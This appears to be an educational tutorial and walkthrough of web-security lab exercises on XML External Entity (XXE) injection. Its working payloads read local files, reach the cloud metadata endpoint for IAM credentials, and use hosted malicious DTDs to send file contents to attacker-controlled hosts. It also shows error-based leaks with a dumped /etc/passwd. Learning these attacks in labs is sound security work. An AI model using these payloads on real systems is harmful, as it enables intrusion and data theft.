XXE, short for XML External Entity, is a vulnerability that occurs when an application processes XML input without properly validating and protecting it. This vulnerability enables attackers to exploit XML parsers and carry out various actions on the vulnerable system, such as accessing arbitrary files or executing remote requests.
The XXE vulnerability arises when an application accepts XML input from un-trusted sources, and this input is then processed by the XML parser. Attackers can take advantage of this by crafting malicious XML input that includes references to external entities. An external entity is an external resource like a file or a URL. When the XML parser handles this input, it tries to resolve the external entity reference, which introduces potential security risks.
Before delving deep into XXE, it is helpful to have a basic understanding of XML and its common terminology. This foundation will enable us to grasp the topic more effectively.
What is XML?
XML, or Extensible Markup Language, is a markup language used for structuring and organizing data in a hierarchical format. It provides a way to define custom tags that describe the content and structure of data. XML is often used for storing and exchanging data between different systems or applications.
In XML, data is enclosed within tags, which define the elements or entities. These elements can have attributes and contain nested elements. XML documents follow a tree-like structure, with a root element at the top and child elements branching off from it.
One of the key features of XML is its extensibility. Users can define their own tags and document structures to suit their specific needs. XML is widely used in various domains, including web services, configuration files, data interchange formats, and more. It provides a standardized way to represent and exchange data, ensuring interoperability between different systems.
In the past, XML was widely popular as a preferred data transport format in web applications. It revolutionized web development by enabling dynamic content updates without page reloads through a technique called "Asynchronous JavaScript and XML (AJAX)." This made web applications more interactive and dynamic. However, in recent times, XML usage has significantly declined due to the emergence of a new data transport method called "JavaScript Object Notation (JSON)." JSON works seamlessly with AJAX and offers shorter data representation compared to XML. As a result, XML's role in data transport has become deprecated.
XML Entities
XML entities provide a means of representing data items within an XML document using placeholders instead of the actual data itself. The XML language specification includes several predefined entities. For instance, the entities < and > stand for the characters < and > respectively. These characters are considered meta characters that signify XML tags. Therefore, when they occur within data, they typically need to be represented using their respective entities.
Document Type Definition (DTD)
In XML, a Document Type Definition (DTD) is a way to define the structure, elements, and attributes of an XML document. It serves as a schema or blueprint that specifies the rules and constraints for the document's content. A DTD defines the allowable elements and their hierarchical relationships, as well as any default values, data types, and entity references used in the document.
The DTD is declared within the optional DOCTYPE element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD") or can be loaded from elsewhere (known as an "external DTD") or can be a hybrid of the two.
External DTD: An external DTD is a separate file that defines the structure and rules for an XML document. Let's say we have an XML document called "employees.xml" that contains information about employees. Here's an example of an external DTD file "employees.dtd" that defines the structure of the "employees.xml" document:
<!ELEMENT employees (employee*)>
<!ELEMENT employee (name, position)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT position (#PCDATA)>
In this example, the external DTD file "employees.dtd" defines the structure of the "employees" element and its child elements "employee", "name", and "position". The DTD specifies that "employees" can have multiple "employee" elements, and each "employee" must have a "name" and a "position" element.
Internal DTD: An internal DTD is defined directly within the XML document itself. Here's an example of an XML document with an internal DTD:
In this example, the Internal DTD serve the same purpose as the external DTD but this time they are declared internally.
By including a DTD declaration in an XML document, developers can validate the document against the defined structure to ensure its correctness and adherence to the specified rules.
Custom Entities
As we discussed earlier, XML entities such as < and > can be represented as < and > respectively. Similarly, we have the flexibility to create our own custom entities in an XML document and modify the document based on the value assigned to those entities. Custom entities are declared in the Document Type Definition (DTD) as follows:
<!DOCTYPE entity_name [ <!ENTITY custom_entity "This Is A Custom Entity">]>
In this declaration, the entity custom_entity is defined with the value "This Is A Custom Entity". Any usage of the entity reference &custom_entity; within the XML document will be replaced with the defined value, resulting in the desired modification of the document.
XML External Entities
XML External Entities (XXE) is a type of custom entity we discussed earlier, but in the case of external entities, the values are stored elsewhere outside the Document Type Definition (DTD) itself. To declare an external entity, we use the SYSTEM keyword to indicate that it is an external resource and provide the URL path from which the value will be fetched. Here's an example:
<!DOCTYPE test [ <!ENTITY ext_entity SYSTEM "https://example.com">]>
In the above example, the value of ext_entity is loaded from the site https://example.com, and any reference to &ext_entity; within the XML document will be replaced with the content fetched from that URL.
External entities can also be loaded from the local server using the file:// protocol. For instance, we can load the content of a local file into the XML document using the following external entity:
<!DOCTYPE test [ <!ENTITY file SYSTEM "file:///home/user/file.txt">]>
In this case, any occurrence of &file; within the XML document will be replaced with the content of the file.txt file.
XML external entities are a key component exploited in XML external entity (XXE) injection attacks. Attackers can leverage these entities to inject their custom external entities, allowing them to retrieve sensitive server files' content or request content from other servers. XXE vulnerabilities can be highly damaging, providing unauthorized access to sensitive information and enabling various forms of attacks.
Now we know about XML, let's move on to the XXE injections attacks.
How do XXE vulnerabilities arise?
The legacy application relies on XML as its main method of data transportation, as we discussed earlier. The application uses standard libraries, APIs, or XML parsers to parse the XML data. Although the application may not intend to use XML external entities, these parsers, APIs, and libraries often support this feature.
Attackers take advantage of this support by manipulating the XML data in a way that tricks the parsers into parsing their added external entity. This allows them to retrieve the content of local files or make external web requests to fetch resources using XML external entities.
XXE Attacks
In XXE Injection attacks, there are various types of exploitation that can occur in real-life scenarios. These include:
Retrieving Files: Attackers can use XXE injection to retrieve files from the server. By injecting malicious XML entities, they can trick the system into disclosing sensitive files.
Server-Side Request Forgery (SSRF): XXE injection can be used to perform SSRF attacks. Attackers can make the vulnerable application send arbitrary requests to other servers, allowing them to interact with external resources.
Blind Data Exfiltration using Out-of-Band (OAST) Techniques: Attackers can leverage XXE injection to exfiltrate data from the server using out-of-band channels. This involves sending data to their controlled external server via XML entities.
Blind XXE to Retrieve Data via Error Messages: By injecting specific XML entities, attackers can trigger error messages from the server that contain sensitive information. These error messages can be used to extract valuable data indirectly.
Let's discuss each of them in detail.
Exploiting XXE to retrieve files
As we discussed earlier, exploiting XXE attacks requires the use of external entities, which need to be introduced in the XML data sent to the server. You have two options to achieve this: either modify the existing DOCTYPE or add the entities directly within the XML data.
In the DOCTYPE declaration, you can define the external entity and specify the server files you want to access. Once the external entity is configured, you can call it within your XML data, which will be processed and returned in the server response. It's important to note that the entity can be placed anywhere within the application where XML data is processed.
Let's take an example of a shopping application that checks the stock level of a product by submitting XML data to the server. The initial XML payload looks like this:
In this scenario, the application doesn't have any defenses against XXE attacks, which allows us to exploit the vulnerability. We can retrieve the contents of the /etc/passwd file by submitting the following XXE payload:
In this XXE payload, we define an external entity &xxe; that fetches the contents of the /etc/passwd file using the file:/// protocol. We then use this entity within the productId value. As a result, the application's response includes the contents of the file:
By exploiting the XXE vulnerability, we are able to retrieve sensitive information from the server, in this case, the contents of the /etc/passwd file.
Note In real-world scenarios, XXE vulnerabilities often involve XML with numerous data values. Each of these values may be used within the application's response, making it necessary to systematically test each data node for XXE vulnerabilities. By utilizing the defined entity and observing whether it appears in the response, you can perform individual tests on each data node in the XML. This approach allows for comprehensive testing and identification of potential XXE vulnerabilities.
LAB #1: Exploiting XXE Using External Entities To Retrieve Files
This lab contains the Check Stock feature that parses XML Input and returns any unexpected values in the response. Use XXE to retrieve the content of the /etc/passwd file.
Solution
This lab showcases a shopping application that sells various products. Each product has its own details page, identified by a productId number, such as https://0af100a304648b108004495600860067.web-security-academy.net/product?productId=6. On the details page, there is information about the product, and it also includes a stock check functionality.
The stock check functionality involves sending a POST request to a backend API to retrieve stock information. The API request contains XML data in the body, specifying the product and store IDs. Here's an example of the API request:
It's obvious that the application uses XML for data transportation. To test if the application accepts XML payloads, we can modify the XML data by introducing a DOCTYPE element.
By introducing a simple DOCTYPE element with a test element, we can check if the application accepts it or blocks it. If the application does not show any error, it means that it accepts the payload.
We can then proceed to introduce external entities to retrieve internal files. The XML payload would look like this:
In this payload, we create an external entity xxe that uses the file:/// protocol to retrieve the /etc/passwd file. We then reference this entity in our XML document. The request and response would appear as follows:
Request
POST /product/stock HTTP/2
Host: 0af100a304648b108004495600860067.web-security-academy.net
Cookie: session=zn0Ea6PIR1aDQmJnpgooHS7IfdWu6FMu
Content-Length: 176
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ] >
<stockCheck>
<productId>&xxe;</productId>
<storeId>1</storeId>
</stockCheck>
As you can see, the content of /etc/passwd is replaced with the &xxe; entity. The API request processes this benign data and throws an error message, unintentionally revealing the content of the /etc/passwd file.
XXE To Perform SSRF Attacks
Apart from retrieving sensitive data, XXE attacks can also be used to carry out server-side request forgery (SSRF). SSRF is a potentially severe vulnerability where the server-side application can be manipulated to make HTTP requests to any URL accessible by the server.
To exploit an XXE vulnerability for performing an SSRF attack, the process is similar to what we have discussed before. Instead of using the file:/// protocol to retrieve local files, we provide the URL of the server to which we want to send the request. Then, we include that entity in the XML data that is returned in the application's response, anywhere within the application.
If we successfully receive the response from the requested server (achieving two-way interaction), it indicates that we have achieved the reflected SSRF condition. However, if we only receive interaction from the server without obtaining its response, we have to rely on blind SSRF conditions. Even though blind SSRF may not provide direct access to the response, it can still be critical in certain situations.
In the following XXE example, the external entity will cause the server to make a back-end HTTP request to an internal system within the organization's infrastructure:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]>
This lab has a "Check stock" feature that parses XML input and returns any unexpected values in the response. Exploit the XXE attack to get the information about the Simulated EC2 metadata endpoint which is running in the following URL:
http://169.254.169.254/
Solution
This lab showcases a shopping application that sells various products. Each product has its own details page, identified by a productId number, for example: https://0af100a304648b108004495600860067.web-security-academy.net/product?productId=6. The details page provides information about the product and includes a stock check functionality.
The stock check functionality involves sending a POST request to a backend API to retrieve stock information. The API request contains XML data in the body, specifying the product and store IDs. Here's an example of the API request:
POST /product/stock HTTP/2
Host: 0a3b00db03d7a2218097947a005e0016.web-security-academy.net
Cookie: session=RQaunglELpPbYgAiHvEsb5Gm2pUoWMtO
Content-Length: 107
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?><stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
Similar to the previous lab, we create an external entity to fetch resources. However, unlike the previous lab where we fetched resources internally using the file:/// protocol, in this lab, we fetch resources externally to perform SSRF-based attacks.
We attempt to access the Cloud Metadata instance to retrieve IAM-related information. The Cloud Metadata instance is available at the URL http://169.254.169.254/.
Our payload for this XXE attack looks like the following:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/">] >
<stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
When we send the above request, the response we receive is:
In this case, the response contains latest, which is a common result when attacking Cloud Metadata instances. To obtain more information, we need to recursively follow the directory tree by appending /latest, /meta-data, /iam, /security-credentials, and eventually /admin to the URL. This will eventually provide us with IAM-related information.
Blind XXE Vulnerabilities
Blind XXE vulnerabilities refer to situations where the application does not directly disclose the values of defined external entities in its responses. This means that retrieving server-side files becomes more challenging.
However, blind XXE vulnerabilities can still be detected and exploited using advanced techniques. One approach is to employ out-of-band techniques, where you leverage external channels to communicate with the attacker-controlled server and exfiltrate data. Another method involves triggering XML parsing errors, which can sometimes reveal sensitive information within error messages.
Detecting Blind XXE Using Out-of-band (OAST) Techniques
To detect blind XXE vulnerabilities, you can utilize the same technique as with the previous XXE injection to perform an SSRF attack. However, in blind XXE injection, you trigger out-of-band network interactions to a system that you control, allowing you to indirectly confirm the success of the attack.
For instance, you can define an external entity within the XML document as follows:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> ]>
Next, you incorporate the defined entity into a data value within the XML. This XXE attack will cause the server to initiate a back-end HTTP request to the specified URL.
By monitoring the resulting DNS lookup and HTTP request on your controlled system, you can determine if the XXE attack was successful, even though the application itself may not directly disclose the information.
Exploit the Check Stock feature that parses the XML, Use XXE injection attack to trigger a DNS lookup and HTTP request to Burp Collaborator.
Solution
This lab has similar functionalities to the previous ones, but this time it won't show us the content of the /etc/passwd file or any Out-of-band interaction responses. Instead, they validate the ProductId, and if it is not valid, they simply throw an "Invalid Product ID" error without disclosing the invalid value we sent in our request, as they did in the previous labs.
Due to the absence of direct feedback through reflected XXE methods, we cannot confirm whether they are parsing XXE payloads or not. However, we can still perform Out-of-band interactions to ascertain if XXE payloads are being processed.
To achieve Out-of-band interactions, we can use services like interact.sh or ngrok to generate a random link that we can use for testing. However, for this lab, we are limited to using Burp Collaborator which comes with a Burp Suite Professional license.
To solve this lab, we can use an arbitrary or random Burp Collaborator link since we are not exfiltrating any data this time. Simply sending a request to any Burp random Collaborator link will solve this lab. The XXE payload remains the same as in the previous labs, but we need to include the Collaborator link in it, as shown below:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://u4zis9sxe3876bfhf0el25vef5lv9k.oastify.com"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>
Submitting the above payload will solve the lab.
In some cases, web applications may implement measures like blocking external entities as a defensive measure, using input validation, or employing other hardening practices. However, even in such situations, XXE injection attacks can still be performed using XML parameter entities.
Parameter Entities
XML Parameter Entities are used to make reusable blocks in the XML document that can be referenced within the DTD. They are similar to general entities, but they are defined and called using the % symbol instead of the & symbol.
<!ENTITY % myparameterentity "my parameter entity value" >
And they can be referenced in the XML document using:
%myparameterentitiy;
As explained above Parameter Entities are commonly used to make reusable blocks in the XML document such as:
In this example, the parameter entity %IT_Staff is defined within the Document Type Definition (DTD) section using the <!ENTITY> declaration. The %IT_Staff entity is assigned the value "<Role>IT Staff</Role><Salary>$2000</Salary>".
The XML document then references the % IT_Staff entity using %IT_Staff; within the <employees> element. This allows the XML content defined in the % IT_Staff entity to be inserted directly into the document at that location.
By using parameter entities, you can define and reuse XML content blocks throughout the document, making it more modular and easier to maintain. Any changes made to the %IT_Staff entity will be reflected wherever it is referenced in the XML document. This promotes code reuse and simplifies the structure of the XML document.
External Parameter Entities
The parameter Entity can also be referenced in the DOCTYPE declaration like the following.
<!DOCTYPE foo [<!ENTITY % book SYSTEM "books.dtd"> %book;]>
This type of parameter entity reference is called an External Parameter Entity. To declare an external parameter entity, we use a regular ENTITY declaration with a % sign, similar to a normal parameter entity. However, instead of directly including the replacement text, the declaration includes the SYSTEM keyword followed by a URI that points to the DTD piece it wants to include. Learn more about Parameter Entities and External Parameter Entities from this link: Parameter Entities
We can use parameter Entities to perform XXE injection attacks like the following.
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>
This XXE payload declares an XML parameter entity called xxe and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful.
LAB #4: Blind XXE With Out-of-band Interaction via XML Parameter Entities
Exploit the Check Stock functionality that supports XML input to perform an XXE injection attack that makes a DNS lookup. This application blocks regular external entities.
Solution
In this lab, the Stock Check functionality still uses XML for data transportation, similar to what we have seen in previous labs. However, when attempting to exfiltrate data using regular external entities, they show the following error message: "Entities are not allowed for security reasons."
Interestingly, they seem to have implemented a mechanism to block the calling of external entities specifically. It means that if you define an external entity in your DOCTYPE but don't call it anywhere in your XML document, you won't receive the above error message.
This indicates that they are blocking the invocation of external entities. As discussed earlier, in this situation, we can utilize parameter-based entities. The XXE payload remains the same, but instead of using External Entities, we use Parameter-based entities as shown below:
As observed in the above payload, we are using parameter-based entities. When this payload is used, you will notice that they throw an XML Parsing error. However, in our Burp Collaborator instance, we can see some interactions being made, indicating that they are still vulnerable to XXE injection attacks.
Blind XXE to Out-of-band Data Exfiltration
The real power of XXE parameter entities comes with its out-of-band data exfiltration. Detecting blind XXE vulnerability via out-of-band interaction is good but its real impact comes when we use that out-of-band interaction to exfiltrate data. This technique is a little harder to exploit but if that is successful it can be really useful.
To exploit Blind XXE and exfiltrate data, we utilize the nesting of XML parameter entities. This involves creating a DTD file that we control, which contains specific content to facilitate the exfiltration of data such as:
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://web-attacker.com/?x=%file;'>">%eval;%exfiltrate;
In the above DTD payload, we define two XML parameter entities. First, we create the file parameter entity that points to the /etc/passwd file. However, at this stage, it doesn't fetch the content of the file. It simply serves as a reference to that file.
Next, we define the eval parameter entity, which contains an internal parameter entity declaration. Within this declaration, we create an entity called exfiltrate, which includes a reference to %file in its value. This means that when %exfiltrate is used in the XML document, the content of %file will be replaced with the actual content of the file.
To make use of these entities, we reference %eval using %eval;, which expands it and introduces the %exfiltrate entity. This enables us to use %exfiltrate in the XML document, triggering the exfiltration of data to the specified URL.
Overall, this payload allows us to leverage parameter entities to manipulate the XML document and perform actions such as exfiltrating data to a specific location.
Note:% is the XML entity that represents % sign.
Now that we have created our malicious DTD file and understand its concept, the next step is to host that DTD file on our controlled server. We can use a URL like http://example.com/malicious.dtd to serve the file.
Once the DTD file is hosted, we can inject it into the vulnerable target server by referencing it within the XML document. The following XML code demonstrates this:
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://example.com/malicious.dtd"> %xxe;]>
In this XML code, we define an XML parameter entity called xxe and then utilize this entity within the DTD. As a result, the XML parser will fetch the external DTD from our controlled server and process it. The defined steps within the malicious DTD will be executed, ultimately leading to the transmission of the /etc/passwd file to our controlled server.
By leveraging this technique, we can exploit the Blind XXE vulnerability and exfiltrate sensitive data from the target server to our desired location.
In certain cases, this technique may not work effectively with certain file contents, particularly if they include newline characters. This limitation arises because some XML parsers use an API that validates the characters allowed within the URL when fetching the URL specified in the external entity definition. In such situations, it may be worth considering an alternative protocol like FTP instead of HTTP.
However, even with the FTP protocol, there might still be constraints on exfiltrating data that contain newline characters. In such scenarios, it could be beneficial to target a different file, such as /etc/hostname, which may not include newline characters and can still provide valuable information.
LAB #5: Exploiting Blind XXE To Exfiltrate Data Using A Malicious External DTD
This lab has a "Check stock" feature that parses XML input but does not display the result.
To solve the lab, exfiltrate the contents of the /etc/hostname file.
Solution
This lab contains the familiar Stock Check functionality that uses XML for data transportation, as seen in previous labs. However, unlike those labs, this one blocks the use of External Entities but permits the use of Parameter-based entities.
Knowing that Parameter-based entities are allowed, we can utilize them to exfiltrate data. The approach involves calling parameter entities to access our controlled DTD file, which contains the use of parameter-based entities to fetch the content of the desired file and make an Out-of-band request to send that data.
First, we navigate to the Exploit server of this lab, where we create and host a malicious DTD file with the following XML DTD code:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://co4j7wzfrzyfq96fllt5snb8qzwpke.oastify.com/?x=%file;'>">
%eval;
%exfiltrate;
In the above DTD file, you can see our Burp Collaborator instance URL, and in the GET parameter, they call %file;, which is a parameter entity containing the content of our file.
We name the file exploit.dtd (or any preferred name) and then click on "Store" at the bottom to save the changes. After this, we copy the hosted URL of this file and modify the XML data in our request accordingly. The modified request looks like this:
POST /product/stock HTTP/2
Host: 0a9b00d503f593ac82974cda00e900c3.web-security-academy.net
Cookie: session=0aYDXP9fddmgOq6aLqb2l6qEAKch2O3i
Content-Length: 236
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Content-Type: application/xml
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0a8a00dd0339934982db4b4801550072.exploit-server.net/exploit.dtd"> %xxe;]>
<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>
In the above request body, you will find our XXE payload that loads our exploit.dtd file and then parses it to send the content of the /etc/hostname file. Upon sending the request, you will notice some out-of-band interactions being made in your Burp Collaborator. Click on the relevant request and then select the Request to Collaborator option to view the entire request, including the GET parameter containing the content of the /etc/hostname file. Copy that content and submit it to successfully solve this lab.
Blind XXE To Retrieve Data Via Error Messages
An alternative method for exploiting blind XXE vulnerabilities is to intentionally trigger an XML parsing error that includes the sensitive data you want to retrieve in the resulting error message. This approach is effective when the application includes the error message within its response.
To accomplish this, you can use a malicious external DTD to trigger an XML parsing error message containing the contents of the /etc/passwd file. Here is an example of the XML payload:
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;
The XML code defines two parameter entities, %file and %eval, and then uses them to define another parameter entity named %error. Here's how it works:
%file is defined to point to the /etc/passwd file using the file:/// protocol.
%eval is defined to contain an internal parameter entity declaration, which creates an entity named %error.
%error is defined to include a reference to %file in its value and uses the file:///nonexistent/ protocol to trigger the error.
Finally, the %eval and %error entities are referenced in the XML document.
When the XML document is parsed, it will attempt to resolve the entities, leading to an XML parsing error. The error message will include the contents of the /etc/passwd file, allowing the attacker to retrieve sensitive data.
We can host that DTD file like we did above and then call that in the XML payload just like we did before. They will call our malicious external DTD file and that will result in an error message containing our file output like the following.
LAB #6: Blind XXE To Retrieve Data Via Error Messages
This lab has a "Check stock" feature that parses XML input but does not display the result. Exploit Blind XXE injection attack to retrieve the content of the /etc/passwd file.
Solution
This lab is similar to the previous one in which we are restricted from using External Entities and Parameter-based entities. Attempting to use external entities results in an error message stating:
Entities are not allowed for security reasons
Similarly, if we try to use parameter-based entities and call them, the application responds with Invalid Product ID. However, when we attempt to make out-of-band interactions using the DOCTYPE with a payload like the following:
We notice interactions in our Burp Collaborator but on the web page, we encounter the following XML error:
XML parser exited with error: org.xml.sax.SAXParseException; systemId: http://kk8liddouirc66n48ft1ze4offl59u.oastify.com; lineNumber: 1; columnNumber: 2; The markup declarations contained or pointed to by the document type declaration must be well-formed.
In this case, the Burp Collaborator instance URL is reflected back in the error message. This suggests that we may be able to exfiltrate data using error messages. To proceed with the exploitation, we go to the exploit server and rename the file to exploit.dtd (or any other desired name), and then add the following payload to the request body:
<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;
After adding the above payload, we click on the "Store" button to save and host the file. We then copy the URL of exploit.dtd and use it to call the DTD file in our XML document as follows:
In the above payload, we use SYSTEM to call our exploit.dtd. The XML parser then parses that DTD file and eventually displays the error message containing the content of the /etc/passwd file, such as:
XML parser exited with error: java.io.FileNotFoundException: /nonexistent/root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinpeter:x:12001:12001::/home/peter:/bin/bashcarlos:x:12002:12002::/home/carlos:/bin/bashuser:x:12000:12000::/home/user:/bin/bashelmer:x:12099:12099::/home/elmer:/bin/bashacademy:x:10000:10000::/academy:/bin/bashmessagebus:x:101:101::/nonexistent:/usr/sbin/nologindnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologinsystemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/falsepostgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashusbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologinrtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologinmongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologinavahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologincups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologingeoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologinsaned:x:114:122::/var/lib/saned:/usr/sbin/nologincolord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologinpulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologingdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/false (No such file or directory)
Blind XXE By Redefining Element Of Local DTD
The technique described above for exploiting blind XXE vulnerabilities via error messages relied on hosting malicious DTD files. However, if the server blocked outbound connections to external servers, the attack could be completely mitigated.
To overcome this limitation, researchers discovered a way to exploit blind XXE injection attacks using an internal DTD. Despite not having the ability to upload a malicious DTD file or having the necessary content in existing system DTD files, they found a loophole in the XML specification. According to the specification, using an XML parameter entity within the definition of another parameter entity is allowed in external DTDs, but not officially supported in internal DTDs.
Arseniy Sharoglazov discovered that by using a hybrid of internal and external DTDs, it becomes possible to redefine entities declared in the external DTD within the internal DTD. This relaxation of the restriction allows for triggering error messages containing sensitive data.
To successfully complete this attack, there are certain conditions that need to be met. First, we need to redefine an entity from an external DTD file. However, since out-of-band connections are blocked, we cannot load any external DTD files directly. In this case, we can rely on previously existing external DTD files that are already present on the local filesystem of the application server.
Once we identify the external DTD files on the local filesystem, we can redefine one of their entities within our internal DTD. We choose an entity that exists in the external DTD but is native and found on another system. By carefully crafting our XML payload, we can trigger an error message that contains sensitive data.
For example, let's assume the DTD files are located at /usr/local/app/schema.dtd on the application server, and one of these DTD files defines an entity called custom_entity. We can trigger an error message containing the content of /etc/passwd with the following XXE payload:
<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"> <!ENTITY % custom_entity '<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"> %eval; %error;'>
%local_dtd; ]>
This DTD payload performs the following steps:
Defines an XML parameter entity called local_dtd, which contains the contents of the external DTD file existing on the server's filesystem.
Redefines the XML parameter entity called custom_entity from the external DTD file. The entity is redefined to include the error-based XXE exploit, as described earlier, for triggering an error message that contains the contents of the /etc/passwd file.
Uses the local_dtd entity, which causes the external DTD to be interpreted, including the redefined value of the custom_entity entity. This ultimately results in the desired error message being generated.
I hope you now have a good understanding of the attack concept and how to exploit it. However, you might be wondering how we can determine which external DTD files are present on the server. Researchers have also discovered a way to enumerate these files, and it's a fairly straightforward process. Since the application returns an error message when an invalid DTD file is loaded, we can use a dictionary attack approach to find a valid DTD on the server.
For instance, let's consider a Linux system using the GNOME desktop environment, which often has a DTD file located at /usr/share/yelp/dtd/docbookx.dtd. To check if this file exists on the system, we can use the following XML payload:
<!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> %local_dtd; ]>
By testing a list of common DTD files and checking if they are present, we can locate a file that exists on the server. Once we find a valid file, we need to obtain a copy of that file and review its contents to identify an entity that we can redefine. Since many common systems that include DTD files are open source, we can typically obtain copies of these files through internet searches or other reliable sources.
LAB #7: Exploiting XXE to retrieve data by repurposing a local DTD
This lab has a "Check stock" feature that parses XML input but does not display the result. Exploit Blind XXE injection to trigger an error message containing the contents of the /etc/passwd file. we'll need to reference an existing DTD file on the server and redefine an entity from it.
Solution
This lab is similar to the one mentioned earlier, where we explored error messages that can be used to exfiltrate data. However, in contrast to the previous lab, the application in this scenario does not provide a straightforward way to host an external DTD file on our exploit server. The application is sending out-of-band connections to our Burp Collaborator instance, but when we attempt to use our exploit server from a different lab to host a malicious DTD file and call it for data exfiltration using an error message, they block it. Specifically, they prevent the declaration of DTD files from external sources.
For example, when using the following payload, which was used successfully in the previous lab:
The application returns the following error message:
XML parser exited with error: java.net.UnknownHostException: exploit-0af600c1048e752781fd4cee01a0004c.exploit-server.net
As you can see, an UnknownHostException is occurring, which typically happens when the IP address of the host cannot be determined from the DNS server. This indicates that they are not allowing resolutions of links to the exploit server or taking some other measures to prevent external DTD hosting. While the application is making out-of-band interactions with our Burp Collaborator, we cannot utilize the Collaborator instance to host DTD files, and this lab does not involve out-of-band interactions with other external servers.
However, we can overcome this situation by repurposing local DTD files. The lab details indicate that the application is using the GNOME desktop environment, which often contains the file /usr/share/yelp/dtd/docbookx.dtd. We can verify its availability using the following XML payload:
In this scenario, if the file exists, we receive a simple response containing the stock information. However, if the file doesn't exist, the application throws the following error message:
XML parser exited with error: java.io.FileNotFoundException: /usr/share/yelp/dtd/docbook.dtd (No such file or directory)
To automate the process of finding DTD files and generating payloads, there are various tools available, and dictionary lists that can be used to fuzz DTD files that exist on the local system. More information related to this can be found in the PayloadsAllTheThings repository.
Since we know that the application has the local DTD file docbookx.dtd, we can repurpose it to exfiltrate the content of /etc/passwd by modifying its elements to throw an error message containing the file's content. The payload will look like the following:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd"> <!ENTITY % ISOamso '<!ENTITY % file SYSTEM "file:///etc/passwd"><!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">%eval;%error;'>
